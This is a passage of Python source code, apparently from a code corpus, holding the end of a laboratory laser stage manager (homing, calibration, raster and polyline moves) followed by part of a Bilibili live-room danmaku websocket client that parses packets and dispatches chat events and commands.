self._stop(ax_key, verbose)
def relative_move(self, *args, **kw):
self.stage_controller.relative_move(*args, **kw)
def key_released(self):
sc = self.stage_controller
sc.add_consumable((sc.update_axes, tuple()))
def moving(self, force_query=False, **kw):
moving = False
if force_query:
moving = self.stage_controller.moving(**kw)
elif self.stage_controller.timer is not None:
moving = self.stage_controller.timer.isActive()
return moving
def get_brightness(self, **kw):
return 0
def get_scores(self, **kw):
return 0, 0
def define_home(self, **kw):
self.stage_controller.define_home(**kw)
def get_z(self):
return self.stage_controller._z_position
def get_uncalibrated_xy(self, pos=None):
if pos is None:
pos = (self.stage_controller.x, self.stage_controller.y)
if self.stage_controller.xy_swapped():
pos = pos[1], pos[0]
canvas = self.canvas
ca = canvas.calibration_item
if ca:
pos = self.stage_map.map_to_uncalibration(
pos, ca.center, ca.rotation, ca.scale
)
return pos
def get_calibrated_xy(self):
pos = (self.stage_controller.x, self.stage_controller.y)
if self.stage_controller.xy_swapped():
pos = pos[1], pos[0]
pos = self.canvas.map_offset_position(pos)
return self.get_calibrated_position(pos)
def get_calibrated_hole(self, x, y, tol):
ca = self.canvas.calibration_item
if ca is not None:
smap = self.stage_map
xx, yy = smap.map_to_uncalibration((x, y), ca.center, ca.rotation)
return next(
(
hole
for hole in smap.sample_holes
if abs(hole.x - xx) < tol and abs(hole.y - yy) < tol
),
None,
)
def get_hole_xy(self, key):
hole = self.stage_map.get_hole(key)
self.debug("hole {} for {}".format(hole, key))
if hole:
if hole.has_correction():
pos = hole.corrected_position
style = "corrected"
else:
style = "calibrated"
pos = hole.nominal_position
pos = self.get_calibrated_position(pos)
self.debug("using {} position={}".format(style, pos))
return pos
# pos = self.stage_map.get_corrected_hole_pos(key)
# pos = self.stage_map.get_hole_pos(key)
# self.debug('hole: {} original x,y = {}'.format(key, pos))
# if pos:
# map the position to calibrated space
# pos = self.get_calibrated_position(pos)
# return pos
def finish_move_to_hole(self, user_entry):
pass
# private
def _update_axes(self):
if self.stage_controller:
self.stage_controller.update_axes()
def _home(self):
""" """
if self._homing:
return
self._homing = True
if self.home_option == "Home All":
msg = "homing all motors"
homed = ["x", "y", "z"]
home_kwargs = dict(x=-25, y=-25, z=50)
elif self.home_option == "XY":
msg = "homing x,y"
homed = ["x", "y"]
home_kwargs = dict(x=-25, y=-25)
else:
# define_home =
msg = "homing {}".format(self.home_option)
home_kwargs = {
self.home_option: -25 if self.home_option in ["X", "Y"] else 50
}
homed = [self.home_option.lower().strip()]
self.info(msg)
# if define_home:
self.stage_controller.set_home_position(**home_kwargs)
self.stage_controller.home(homed)
# explicitly block
# self.stage_controller.block()
if "z" in homed and "z" in self.stage_controller.axes:
# will be a positive limit error in z
# self.stage_controller.read_error()
time.sleep(1)
self.info("setting z to nominal position. {} mm ".format(self._default_z))
self.stage_controller.single_axis_move("z", self._default_z, block=True)
self.stage_controller._z_position = self._default_z
if self.home_option in ["XY", "Home All"]:
time.sleep(0.25)
# the stage controller should think x and y are at -25,-25
self.stage_controller._x_position = -25
self.stage_controller._y_position = -25
self.info("moving to center")
try:
self.stage_controller.linear_move(0, 0, block=True, sign_correct=False)
except TargetPositionError as e:
self.warning_dialog("Move Failed. {}".format(e))
self._homing = False
def _get_hole_by_position(self, x, y):
if self.stage_map:
return self.stage_map._get_hole_by_position(x, y)
def _get_hole_by_name(self, key):
sm = self.stage_map
return sm.get_hole(key)
# ===============================================================================
# special move
# ===============================================================================
def _stop(self, ax_key=None, verbose=False):
self.stage_controller.stop(ax_key=ax_key, verbose=verbose)
if self.parent.pattern_executor:
self.parent.pattern_executor.stop()
# def _move(self, func, pos, name=None, *args, **kw):
# if pos is None:
# return
#
# if self.move_thread and self.move_thread.isRunning():
# self.stage_controller.stop()
# if name is None:
# name = func.func_name
#
# self.move_thread = Thread(name='stage.{}'.format(name),
# target=func, args=(pos,) + args, kwargs=kw)
# self.move_thread.start()
def _drill_point(self, pt):
zend = pt.zend
vel = pt.velocity
# assume already at zstart
st = time.time()
self.info("start drilling. move to {}. velocity={}".format(zend, vel))
self.set_z(zend, velocity=vel, block=True)
et = time.time() - st
self.info("drilling complete. drilled for {}s".format(et))
def _move_polygon(
self,
pts,
velocity=5,
offset=50,
use_outline=True,
find_min=False,
scan_size=None,
use_move=True,
use_convex_hull=True,
motors=None,
verbose=True,
start_callback=None,
end_callback=None,
):
"""
motors is a dict of motor_name:value pairs
"""
if pts is None:
return
if not isinstance(pts, list):
velocity = pts.velocity
use_convex_hull = pts.use_convex_hull
if scan_size is None:
scan_size = pts.scan_size
use_outline = pts.use_outline
offset = pts.offset
find_min = pts.find_min
pts = [
dict(
xy=(pi.x, pi.y),
z=pi.z,
)
for pi in pts.points
]
# set motors
if motors is not None:
            for k, v in motors.items():
"""
motor will not set if it has been locked using set_motor_lock or
remotely using SetMotorLock
"""
if use_move:
self.parent.set_motor(k, v, block=True)
xy = [pi["xy"] for pi in pts]
n = 1000
if scan_size is None:
scan_size = n / 2
# convert points to um
pts = array(xy)
pts *= n
pts = asarray(pts, dtype=int)
"""
sort clockwise ensures consistent offset behavior
        a polygon can have an inner or outer sense depending on the order of its vertices
always use sort_clockwise prior to any polygon manipulation
"""
pts = sort_clockwise(pts, pts)
sc = self.stage_controller
sc.set_program_mode("absolute")
# do smooth transitions between points
sc.set_smooth_transitions(True)
if use_convex_hull:
pts = convex_hull(pts)
if use_outline:
# calculate new polygon
offset_pts = polygon_offset(pts, -offset)
offset_pts = array(offset_pts, dtype=int)
            # polygon offset works with 3D vectors;
# trim to only x,y
pts = offset_pts[:, (0, 1)]
# trace perimeter
if use_move:
p0 = xy[0]
self.linear_move(p0[0], p0[1], mode="absolute", block=True)
sc.timer = sc.timer_factory()
if start_callback is not None:
start_callback()
# buf=[]
for pi in xy[1:]:
self.linear_move(
pi[0],
pi[1],
velocity=velocity,
mode="absolute",
set_stage=False,
)
# finish at first point
self.linear_move(
p0[0], p0[1], velocity=velocity, mode="absolute", set_stage=False
)
sc.block()
self.info("polygon perimeter trace complete")
"""
        there is an opportunity here to turn off the laser and change parameters, e.g. the mask
"""
if use_move:
# calculate and step thru scan lines
self._raster(
pts,
velocity,
step=scan_size,
scale=n,
find_min=find_min,
start_callback=start_callback,
end_callback=end_callback,
verbose=verbose,
)
sc.set_program_mode("relative")
if end_callback is not None:
end_callback()
self.info("polygon raster complete")
def _raster(
self,
points,
velocity,
step=500,
scale=1000,
find_min=False,
start_callback=None,
end_callback=None,
verbose=False,
):
from pychron.core.geometry.scan_line import raster
lines = raster(points, step=step, find_min=find_min)
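        # `raster` is expected to return, for each horizontal scan line, the y value
        # and the x coordinates where that line crosses the polygon; the loop below
        # lases between successive intersection pairs, flipping `direction` each pass
        # so the stage sweeps back and forth across the polygon.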
# initialize variables
cnt = 0
direction = 1
flip = False
lasing = False
sc = self.stage_controller
if verbose:
self.info("start raster")
# print lines
# loop thru each scan line
# for yi, xs in lines[::skip]:
for yi, xs in lines:
if direction == -1:
xs = list(reversed(xs))
            # if the number of intersections is odd, dedupe to make it even
n = len(xs)
if n % 2 != 0:
xs = sorted(list(set(xs)))
# traverse each x-intersection pair
n = len(xs)
for i in range(0, n, 2):
if len(xs) <= 1:
continue
x1, x2, yy = xs[i] / scale, xs[i + 1] / scale, yi / scale
if abs(x1 - x2) > 1e-10:
if not lasing:
if verbose:
self.info("fast to {} {},{}".format(cnt, x1, yy))
self.linear_move(
x1, yy, mode="absolute", set_stage=False, block=True
)
if start_callback is not None:
start_callback()
lasing = True
else:
if verbose:
self.info("slow to {} {},{}".format(cnt, x1, yy))
sc.timer = sc.timer_factory()
self.linear_move(
x1, yy, mode="absolute", set_stage=False, velocity=velocity
)
if verbose:
self.info("move to {}a {},{}".format(cnt, x2, yy))
# if n > 2 and not i * 2 >= n:
                    # if this scan line has more than one segment, turn off the laser at the end of this segment
if i + 2 < n and not xs[i + 1] == xs[i + 2]:
self.linear_move(
x2,
yy,
velocity=velocity,
mode="absolute",
set_stage=False,
block=True,
)
self.info("wait for move complete")
if end_callback is not None:
end_callback()
lasing = False
else:
self.linear_move(
x2,
yy,
velocity=velocity,
mode="absolute",
set_stage=False,
)
cnt += 1
flip = True
else:
flip = False
if flip:
direction *= -1
sc.block()
if verbose:
self.info("end raster")
def _move_polyline(self, pts, start_callback=None, end_callback=None):
if not isinstance(pts, list):
segs = pts.velocity_segments
segs = segs[:1] + segs
pts = [
dict(xy=(pi.x, pi.y), z=pi.z, velocity=vi)
for vi, pi in zip(segs, pts.points)
]
sc = self.stage_controller
self.linear_move(
pts[0]["xy"][0],
pts[0]["xy"][1],
update_hole=False,
use_calibration=False,
block=True,
)
sc.set_z(pts[0]["z"], block=True)
cpos = dict()
# set motors
for motor in ("mask", "attenuator"):
if motor in pts[0]:
self.parent.set_motor(motor, pts[0][motor])
cpos[motor] = pts[0][motor]
sc.set_program_mode("absolute")
sc.timer = sc.timer_factory()
if start_callback:
start_callback()
npts = pts[1:]
setmotors = dict()
for i, di in enumerate(npts):
xi, yi, zi, vi = di["xy"][0], di["xy"][1], di["z"], di["velocity"]
sc.set_z(zi)
block = False
for motor in ("mask", "attenuator"):
                # if the next step sets a motor, this move should block until complete
if i + 1 < len(npts):
dii = npts[i + 1]
if motor in dii and dii[motor] != cpos[motor]:
m = self.parent.get_motor(motor)
if not m.locked:
block = True
setmotors[motor] = dii[motor]
self.linear_move(
xi,
yi,
velocity=vi,
block=block,
mode="absolute", # use absolute mode because commands are queued
set_stage=False,
)
if block:
if end_callback:
end_callback()
for k, v in setmotors.items():
self.parent.set_motor(k, v, block=True)
if start_callback:
start_callback()
# wait until motion complete
sc.block()
if end_callback:
end_callback()
sc.set_program_mode("relative")
# if start and smooth:
# sc.execute_command_buffer()
# sc.end_command_buffer()
# def start_enqueued(self):
# sc = self.stage_controller
# sc.execute_command_buffer()
# sc.end_command_buffer()
def _move_to_point(self, pt):
self.debug("move to point={}".format(pt))
if isinstance(pt, str):
pt = self.canvas.get_point(pt)
self.debug("move to point canvas pt={}".format(pt))
if pt is not None:
pos = pt.x, pt.y
self.info(
"Move to point {}: {:0.5f},{:0.5f},{:0.5f}".format(
pt.identifier, pt.x, pt.y, pt.z
)
)
self.stage_controller.linear_move(block=True, *pos)
if hasattr(pt, "z"):
self.stage_controller.set_z(pt.z, block=True)
self.debug("Not setting motors for pt")
# self.parent.set_motors_for_point(pt)
self._move_to_point_hook()
self.info("Move complete")
self.update_axes()
def _move_to_hole(
self, key, correct_position=True, user_entry=False, autocenter_only=False
):
self.info("Move to hole {} type={}".format(key, str(type(key))))
autocentered_position = False
if not autocenter_only:
self.temp_hole = key
self.temp_position = self.stage_map.get_hole_pos(key)
pos = self.stage_map.get_corrected_hole_pos(key)
self.info("position {}".format(pos))
if pos is not None:
if abs(pos[0]) < 1e-6:
pos = self.stage_map.get_hole_pos(key)
# map the position to calibrated space
pos = self.get_calibrated_position(pos, key=key)
else:
# check if this is an interpolated position
# if so probably want to do an autocentering routine
hole = self.stage_map.get_hole(key)
if hole.interpolated:
self.info("using an interpolated value")
else:
self.info("using previously calculated corrected position")
autocentered_position = True
try:
self.stage_controller.linear_move(
block=True,
source="move_to_hole {}".format(pos),
raise_zero_displacement=True,
*pos
)
except TargetPositionError as e:
self.warning("(001) Move to {} failed".format(pos))
self.parent.emergency_shutoff(str(e))
return
except ZeroDisplacementException:
correct_position = False
try:
self._move_to_hole_hook(key, correct_position, autocentered_position)
except TargetPositionError as e:
self.warning("(002) Move failed. {}".format(e))
self.parent.emergency_shutoff(str(e))
return
self.finish_move_to_hole(user_entry)
self.info("Move complete")
def _move_to_hole_hook(self, *args):
pass
def _move_to_point_hook(self):
pass
# ===============================================================================
# Property Get / Set
# ===============================================================================
def _set_stage_map(self, v):
if v in self.stage_map_names:
for root, ext in ((self.root, ".txt"), (paths.user_points_dir, ".yaml")):
p = os.path.join(root, add_extension(v, ext))
if os.path.isfile(p):
self.info("setting stage map to {}".format(v))
sm = self.stage_map_klass(file_path=p)
self.canvas.set_map(sm)
self.tray_calibration_manager.load_calibration(stage_map=v)
self.points_programmer.load_stage_map(sm)
return True
else:
self.warning('No stage map named "{}"'.format(v))
return False
def _get_calibrate_stage_label(self):
if self._calibration_state == "set_center":
r = "Locate Center"
elif self._calibration_state == "set_right":
r = "Locate Right"
else:
r = "Calibrate Stage"
return r
def _get_program_points_label(self):
return "Program Points" if not self.canvas.markup else "End Program"
def _validate_hole(self, v):
nv = None
try:
if v.strip():
nv = int(v)
        except (TypeError, ValueError):
self.warning("invalid hole {}".format(v))
return nv
# def _get_calibrated_position_entry(self):
# return self._calibrated_position
#
# def _set_calibrated_position_entry(self, v):
# self._calibrated_position = v
# if XY_REGEX.match(v):
# self._move_to_calibrated_position(v)
# else:
# self.move_to_hole(v)
def _move_to_calibrated_position(self, pos):
try:
args = csv_to_floats(pos)
except ValueError:
self.warning(
'invalid calibrated position "{}". Could not convert to floats'.format(
pos
)
)
return
if len(args) == 2:
x, y = args
self.linear_move(x, y, use_calibration=True, block=False)
else:
self.warning(
'invalid calibrated position. incorrect number of arguments "{}"'.format(
args
)
)
def _set_point(self, v):
if self.canvas.calibrate:
self.warning_dialog("Cannot move while calibrating")
return
if self.canvas.markup:
self.warning_dialog("Cannot move while adding/editing points")
return
if (
self.move_thread is None or not self.move_thread.isRunning()
) and v is not self._point:
pos = self.canvas.get_item("point", int(v) - 1)
if pos is not None:
self._point = v
self.move_thread = Thread(target=self._move_to_point, args=(pos,))
self.move_thread.start()
else:
err = "Invalid point {}".format(v)
self.warning(err)
return err
def _get_point(self):
return self._point
# ===============================================================================
# handlers
# ===============================================================================
def _manual_override_position_button_fired(self):
sm = self.stage_map
pos = self.calibrated_position_entry
hole = self.stage_map.get_hole(pos)
if hole is not None:
x, y = self.stage_controller.x, self.stage_controller.y
sm.set_hole_correction(pos, x, y)
sm.dump_correction_file()
self.info(
"updated {} correction file. Saved {}: {},{}".format(
sm.name, pos, x, y
)
)
def _stop_button_fired(self):
self._stop()
def _ejoystick_fired(self):
self.joystick = not self.joystick
if self.joystick:
self.stage_controller.enable_joystick()
self.joystick_label = "Disable Joystick"
self.joystick_timer = self.timer_factory(
func=self._joystick_inprogress_update
)
else:
if self.joystick_timer is not None:
self.joystick_timer.Stop()
self.stage_controller.disable_joystick()
self.joystick_label = "Enable Joystick"
def _home_fired(self):
""" """
t = Thread(name="stage.home", target=self._home)
t.start()
# need to store a reference to thread so it is not garbage collected
self.move_thread = t
# do_later(self._home)
def _test_fired(self):
# self.do_pattern('testpattern')
self.do_pattern("pattern003")
# ===============================================================================
# factories
# ===============================================================================
def _motion_configure_factory(self, **kw):
return MotionControllerManager(
motion_controller=self.stage_controller, application=self.application, **kw
)
def _stage_controller_factory(self):
if self.stage_controller_klass == "Newport":
from pychron.hardware.newport.newport_motion_controller import (
NewportMotionController,
)
factory = NewportMotionController
elif self.stage_controller_klass == "Aerotech":
from pychron.hardware.aerotech.aerotech_motion_controller import (
AerotechMotionController,
)
factory = AerotechMotionController
elif self.stage_controller_klass == "Zaber":
from pychron.hardware.zaber.zaber_motion_controller import (
LegacyBinaryZaberMotionController,
)
factory = LegacyBinaryZaberMotionController
m = factory(
name="{}controller".format(self.name),
configuration_name="stage_controller",
configuration_dir_name=self.configuration_dir_name,
parent=self,
)
return m
def _canvas_factory(self):
""" """
w = 640 / 2.0 / 23.2
h = 0.75 * w
l = LaserTrayCanvas(
stage_manager=self,
padding=[30, 5, 5, 30],
map=self.stage_map,
view_x_range=[-w, w],
view_y_range=[-h, h],
)
return l
# ===============================================================================
# defaults
# ===============================================================================
def _motion_controller_manager_default(self):
return self._motion_configure_factory()
def _title_default(self):
return "%s Stage Manager" % self.name[:-5].capitalize()
def _points_programmer_default(self):
pp = PointsProgrammer(
canvas=self.canvas, stage_map_klass=self.stage_map_klass, stage_manager=self
)
pp.on_trait_change(self.move_to_point, "point")
pp.on_trait_change(self.move_polygon, "polygon")
pp.on_trait_change(self.move_polyline, "line")
return pp
# ===============================================================================
# mass spec hacks
# ===============================================================================
# _temp_position = None
# def _get_temp_position(self):
# return self._temp_position
#
# def _set_temp_position(self, v):
# self._temp_position = v
#
# temp_position = property(fget=_get_temp_position,
# fset=_set_temp_position)
if __name__ == "__main__":
from pychron.core.helpers.logger_setup import logging_setup
logging_setup("stage_manager")
name = "diode"
s = StageManager(
name="{}stage".format(name),
configuration_dir_name=name,
# parent = DummyParent(),
window_width=945,
window_height=545,
)
# from pychron.initializer import Initializer
#
# i = Initializer()
# i.add_initialization(dict(name = 'stage_manager',
# manager = s
# ))
# i.run()
# s.update_axes()
s.load()
s.stage_controller.bootstrap()
s.configure_traits()
# ========================EOF============================
# view groups
# ===============================================================================
# def _hole__group__(self):
# g = Group(HGroup(Item('hole'), spring))
# return g
# def _position__group__(self):
# g = Group(HGroup(Item('calibrated_position_entry', label='Position',
# tooltip='Enter a x,y point in reference frame space',
# ), spring))
# g = Group(
# Item('calibrated_position_entry',
# show_label=False,
# tooltip='Enter a positon e.g 1 for a hole, or 3,4 for X,Y'
# ), label='Calibrated Position',
# show_border=True)
# return g
# def _button__group__(self):
# '''
# '''
# vg = VGroup()
#
# home = self._button_factory(*self.buttons[0])
# calibrate_stage = self._button_factory(*self.buttons[1])
#
# vg.content.append(HGroup(calibrate_stage, home,
# Item('home_option',
# editor=EnumEditor(values=self.home_options),
# show_label=False)))
#
# if len(self.buttons) > 2:
# # vg.content.append(self._button_group_factory(self.buttons[:2], orientation = 'h'))
# vg.content.append(self._button_group_factory(self.buttons[2:], orientation='h'))
# return vg
# def _axis__group__(self):
# '''
# '''
# return Item('stage_controller', show_label=False, style='custom')
#
#
# def _sconfig__group__(self):
# '''
# '''
# return Group(
# # Item('pattern_manager',
# # label='Pattern',
# # editor=InstanceEditor(view='execute_view'),
# # show_label=False, style='custom'
# # ),
#
# Group(
# Item('canvas', show_label=False,
# editor=InstanceEditor(view='config_view'),
# style='custom'
# ),
# label='Canvas'),
#
# # Group(Item('motion_controller_manager', editor=InstanceEditor(view='configure_view'),
# # style='custom', show_label=False),
# # Item('motion_profiler', style='custom', show_label=False),
# # label='Motion'
# # ),
#
# # Group(
# # self._button_factory('program_points', 'program_points_label'),
# # Item('accept_point', show_label=False),
# # Item('load_points', show_label=False),
# # Item('save_points', show_label=False),
# # Item('clear_points', show_label=False),
# # label='Points'),
# Item('points_programmer',
# label='Points',
# show_label=False, style='custom'),
# Item('tray_calibration_manager',
# label='Calibration',
# show_label=False, style='custom'),
# # Item('pattern_manager',
# # label='Pattern',
# # editor=InstanceEditor(view='execute_view'),
# # show_label=False, style='custom'
# # ),
#
# # Item('output', show_label = False, style = 'custom'),
#
# # Item('jog_manager', show_label = False, style = 'custom',
# # resizable=False
# # ),
# layout='tabbed'
# )
|
sclass.py
|
from abc import ABCMeta, abstractmethod
from zlib import decompress
from collections import namedtuple
from biliLive.http_api import Link
from threading import Thread, Lock
import biliLive.bilibiliApi as bapi
import requests
import sys
import os
import time
import websocket
import json
import struct
HeaderTuple = namedtuple('HeaderTuple', ('pack_len', 'raw_header_size', 'ver', 'operation', 'seq_id'))
HEADER_STRUCT = struct.Struct('>I2H2I')
WS_OP_HEARTBEAT = 2  # heartbeat
WS_OP_HEARTBEAT_REPLY = 3  # heartbeat reply (carries the popularity value)
WS_OP_MESSAGE = 5  # danmaku, notifications, etc.
WS_OP_USER_AUTHENTICATION = 7  # client authentication (enter room)
WS_OP_CONNECT_SUCCESS = 8  # enter-room acknowledgement
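# Packet framing implied by HEADER_STRUCT ('>I2H2I', big-endian):
#   pack_len         uint32  total packet length, header included
#   raw_header_size  uint16  header length (16)
#   ver              uint16  body version; 2 means the body is zlib-compressed
#   operation        uint32  one of the WS_OP_* codes above
#   seq_id           uint32  sequence number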
class User(Link, metaclass=ABCMeta):
def __init__(self, headers, userData):
super().__init__(headers)
self.api = bapi.BiliApi(headers)
        # user id
        self.id = userData["mid"]
        # user name
        self.name = userData["uname"]
        # user avatar
        self.cover = userData["face"]
        # user level
        self.level = userData["level"]["current_level"]
        # current experience points
        self.exp = userData["level"]["current_exp"]
        # experience required for the next level
        self.upExp = userData["level"]["next_exp"]
# Abstract live room
class Live(Link, metaclass=ABCMeta):
def __init__(self, headers, liveData):
super().__init__(headers)
self.api = bapi.BiliApi(headers)
self.commandList = None
        # room id
        self.id = liveData["room_id"]
        # room title
        self.name = liveData["title"]
        # room tags
        self.tags = liveData["tags"].split(",")
        # streamer uid
        self.userId = liveData["uid"]
        # streamer name
        self.userName = liveData["uname"]
        # streamer follower count
        self.attention = liveData["attention"]
        # room description
        self.description = liveData["description"]
        # popularity
        self.online = liveData["online"]
        # room url
        self.liveUrl = liveData["live_url"]
        # room cover image
        self.cover = liveData["cover"]
        # room background image
        self.background = liveData["background"]
        # room category (area)
        self.area = {
            "parent_area": [liveData["parent_area_id"], liveData["parent_area_name"]],
            "area": [liveData["area_id"], liveData["area_name"]]
        }
        # room category as a display string
        self.area_str = "%s · %s" % (self.area["parent_area"][1], self.area["area"][1])
        # stream start time
        self.live_time = liveData["live_time"]
        # live session id
        self.live_id = liveData["live_id"]
        self._getLiveRoomStyle()
        # polling interval between danmaku reads (seconds)
        self.msg_loop_sleep = 2
        self.__code = None
        self.bind()
def get_live(room_id):
api = f"https://api.live.bilibili.com/xlive/web-room/v1/index/getDanmuInfo?id={room_id}&type=0"
with requests.get(api) as req:
data = req.json()["data"]
host, port = data["host_list"][0]["host"], data["host_list"][0]["wss_port"]
return host, port, data["token"]
        # danmaku (message-stream) server list
        host, port, token = get_live(self.id)
        self.host_list = ["wss://%s:%s/sub" % (host, port)]
        # authentication packet body
self.certificationPack = {
"roomid": self.id,
"uid": 0,
"protover": 1,
"platform": "web",
"clientver": "1.4.0",
"key": token,
"type": 2
}
self.wsAppEvent = {
WS_OP_HEARTBEAT_REPLY: self.heart_beat_reply,
WS_OP_MESSAGE: self.new_message,
WS_OP_CONNECT_SUCCESS: self.connect_success
}
        # live-room "cmd" event handlers
        self.liveEvent = {
            # danmaku message
            "DANMU_MSG": self._message,
            # regular user enters the room
            "INTERACT_WORD": self.__event.welcome,
            # live VIP ("lord") enters the room
            "WELCOME_GUARD": self.__event.welcome_guard,
            # guard (captain) enters the room
            "ENTRY_EFFECT": self.__event.entry_effect,
            # Super Chat message
            "SUPER_CHAT_MESSAGE": self.__event.super_msg,
            # Super Chat message (Japanese)
            "SUPER_CHAT_MESSAGE_JPN": self.__event.super_msg,
            # gift sent
            "SEND_GIFT": self.__event.send_gift,
            # gift combo
            "COMBO_SEND": self.__event.combo_send_gift,
            # live interactive game, also a gift event (purpose unclear)
            "LIVE_INTERACTIVE_GAME": self.__event.send_gift_game,
            # anchor lottery ("chosen one") starts
            "ANCHOR_LOT_START": self.__event.anchor_lot_start,
            # anchor lottery ends
            "ANCHOR_LOT_END": self.__event.anchor_lot_end,
            # anchor lottery results
            "ANCHOR_LOT_AWARD": self.__event.anchor_lot_award,
            # new guard (captain) purchase
            "GUARD_BUY": self.__event.guard_buy,
            # guard membership renewed
            "USER_TOAST_MSG": self.__event.guard_renew,
            # site-wide announcement
            "NOTICE_MSG": self.__event.notice_msg,
            # hourly ranking change
            "ACTIVITY_BANNER_UPDATE_V2": self.__event.activity_banner_update,
            # follower count change
            "ROOM_REAL_TIME_MESSAGE_UPDATE": self.__event.room_data_update,
            # high-energy (top contributors) ranking change
            "ONLINE_RANK_V2": self.__event.online_rank,
            # streamer ranking change
            "ONLINE_RANK_COUNT": self.__event.live_rank,
            # hot ranking change
            "HOT_RANK_CHANGED_V2": self.__event.hot_rank,
            # hot ranking counter? (purpose unclear)
            "HOT_RANK_CHANGED": self.__event.hot_rank_changed,
            # live activity change (payload keeps changing; left empty, implement if needed)
            "WIDGET_BANNER": self.__event.activity,
            # limited-time hot ranking entry
            "HOT_RANK_SETTLEMENT_V2": self.__event.hot_rank_settlement,
            # same as above, with less data
            "HOT_RANK_SETTLEMENT": self.__event.hot_rank_settlement,
            # list of rooms that stopped streaming
            "STOP_LIVE_ROOM_LIST": self.__event.stop_live_room_list,
            # PK data
            "PK_BATTLE_PROCESS": self.__event.pk_battle_process,
            # PK data (new format)
            "PK_BATTLE_PROCESS_NEW": self.__event.pk_battle_process_new,
            # PK final round
            "PK_BATTLE_FINAL_PROCESS": self.__event.pk_battle_process_final,
            # PK end
            "PK_BATTLE_END": self.__event.pk_battle_end,
            # PK settlement (per user)
            "PK_BATTLE_SETTLE_USER": self.__event.pk_battle_settle_user,
            # PK settlement
            "PK_BATTLE_SETTLE_V2": self.__event.pk_battle_settle,
            # PK win streak
            "COMMON_NOTICE_DANMAKU": self.__event.common_notice_danmaku,
            "ENTRY_EFFECT_MUST_RECEIVE": self.__event.miscellaneous,
        }
    def bind(self, commandList=None, event=None):
        self.__event = bapi.event() if event is None else event
        self.__event.live = self
        self.__commandList = bapi.commandList() if commandList is None else commandList
        self.__commandList.event = self.__event
def _getLiveRoomStyle(self):
roomUserData = self.api.getLiveRoomUserData(self.id)
self.style = {
"msgColor": roomUserData["property"]["danmu"]["color"]
}
def _getMsgStyle(self, msg):
msg = {
"color": self.style["msgColor"],
"send_time": int(time.time()),
"msg": msg
}
return msg
def make_packet(self, data, operation):
body = json.dumps(data).encode('utf-8')
header = HEADER_STRUCT.pack(
HEADER_STRUCT.size + len(body),
HEADER_STRUCT.size,
1,
operation,
1
)
return header + body
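    # Illustrative example: make_packet({}, 2) yields the 16-byte header
    # 00 00 00 12 00 10 00 01 00 00 00 02 00 00 00 01
    # (pack_len=18, header_size=16, ver=1, operation=2 heartbeat, seq_id=1)
    # followed by the two-byte body b'{}'.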
def set_body(self, message):
header = HeaderTuple(*HEADER_STRUCT.unpack_from(message, 0))
body = message[HEADER_STRUCT.size: header.pack_len]
if header.ver == 2:
return self.set_body(decompress(body))
else:
try:
return header, json.loads(body.decode())
            except ValueError:
                # heartbeat reply: the body is a big-endian uint32 popularity value
                popularity = int.from_bytes(message[HEADER_STRUCT.size: HEADER_STRUCT.size + 4], 'big')
                return header, popularity
def _msg_loop(self, debug=False):
def loop():
if debug:
websocket.enableTrace(True)
            # set up the connection
wsapp = websocket.WebSocketApp(self.host_list[0],
on_message=self.on_message, on_ping=self.on_ping, on_pong=self.on_pong, on_close=self.on_close,
on_error=self.on_error)
wsapp.on_open = self.on_open
            # open the connection and keep it running
wsapp.run_forever(ping_interval=40, ping_timeout=30)
thread = Thread(target=loop)
        thread.daemon = True
thread.start()
self.msg_loop_thread = thread
def on_message(self, wsapp, message):
"""
事件 on_message 接收服务器数据
"""
# 数据解析
header, message = self.set_body(message)
# 事件执行
if header.operation in self.wsAppEvent:
self.wsAppEvent[header.operation](message)
else:
print("未知数据协议:%s" % message)
def on_ping(self, wsapp, message):
pass
def on_pong(self, wsapp, message):
"""
事件 on_pong 接收到服务器心跳包
"""
# 向服务器发送心跳包
print("发送心跳包...")
wsapp.send(self.make_packet({}, 2))
def on_open(self, wsapp):
"""
事件 on_open 连接启动
"""
# 发送认证包
print("正在连接 %s (id: %s)直播间, 发送认证包..." % (self.name, self.id))
wsapp.send(self.make_packet(self.certificationPack, 7))
def on_close(self, wsapp, close_status_code, close_msg):
print(wsapp, close_status_code, close_msg, "on_close........")
    def on_error(self, wsapp, err):
        print("Got an error: ", err)
def heart_beat_reply(self, popularity):
"""
事件 heart_beat_reply 心跳回应
"""
self.__event.popularity_update(popularity)
def connect_success(self, message):
"""
事件 connect_success 进房回应
"""
print("连接成功! 接收到了服务器的进房回应")
def new_message(self, message):
"""
事件 new_message 直播间信息
"""
if message["cmd"] in self.liveEvent:
self.liveEvent[message["cmd"]](message)
else:
self.__event.miscellaneous(message)
def _message(self, message):
msg = format.msg(message)
commandSign, comm, commKey = self.__event.set_command_list(msg["msg"], self.__commandList.commandSign)
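        # With the default Event.set_command_list, a danmaku such as "/roll 100"
        # (hypothetical command) is split into commandSign="/", comm="roll", commKey=["100"].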
        # new-danmaku callback
self.__event.msg_log(msg)
        # check whether this is a command
if commandSign != self.__commandList.commandSign:
return
        # look it up in the command list
        if comm not in self.__commandList.command:
self.__code = self.__commandList.commandNameError()
self.__event.command_err_log(self.__code, msg, "commandNameError")
return
        # execute the method bound to the command
try:
            # check command permissions
if comm in self.__commandList.purviewCommand:
if msg["userId"] in self.__commandList.purview:
self.__code = self.__commandList.command[comm](commKey, msg)
self.__event.command_log(self.__code, msg, comm)
else:
self.__code = self.__commandList.purviewError()
self.__event.command_err_log(self.__code, msg, "purviewError")
return
self.__code = self.__commandList.command[comm](commKey, msg)
self.__event.command_log(self.__code, msg, comm)
except IndexError:
            # command execution error callback
self.__code = self.__commandList.commandError()
self.__event.command_err_log(self.__code, msg, "commandError")
def time_loop_job(self, jobTime, job):
while True:
time.sleep(jobTime)
self.__event.command_log(job(), None, None)
def _time_loop(self):
send_msg_thread_list = []
for jobTime in self.__commandList.timeLoopList:
if type(self.__commandList.timeLoopList[jobTime]) == str:
                def job(key=jobTime):
                    # bind the current jobTime; a plain closure would only see the last loop value
                    return self.__event.send_msg(self.__commandList.timeLoopList[key])
else:
job = self.__commandList.timeLoopList[jobTime]
thread = Thread(target=self.time_loop_job, args=(jobTime, job))
            thread.daemon = True
send_msg_thread_list.append(thread)
for thread in send_msg_thread_list:
thread.start()
self.send_msg_loop_thread = send_msg_thread_list
def msg_loop(self, debug=False):
self.__event.msg_loop(debug)
def time_loop(self):
self.__event.time_loop()
class Event(metaclass=ABCMeta):
def __init__(self):
self.live = None
@abstractmethod
def set_command_list(self, msg, commandSign):
"""
设置指令格式, 默认使用 任意指令标识符, 参数空格隔开
叁数:
msg: 弹幕数据列表
commandSign: 当前绑定的指令标识符
需返回: 指令标识符, 无标识符的指令字段, 指令参数
"""
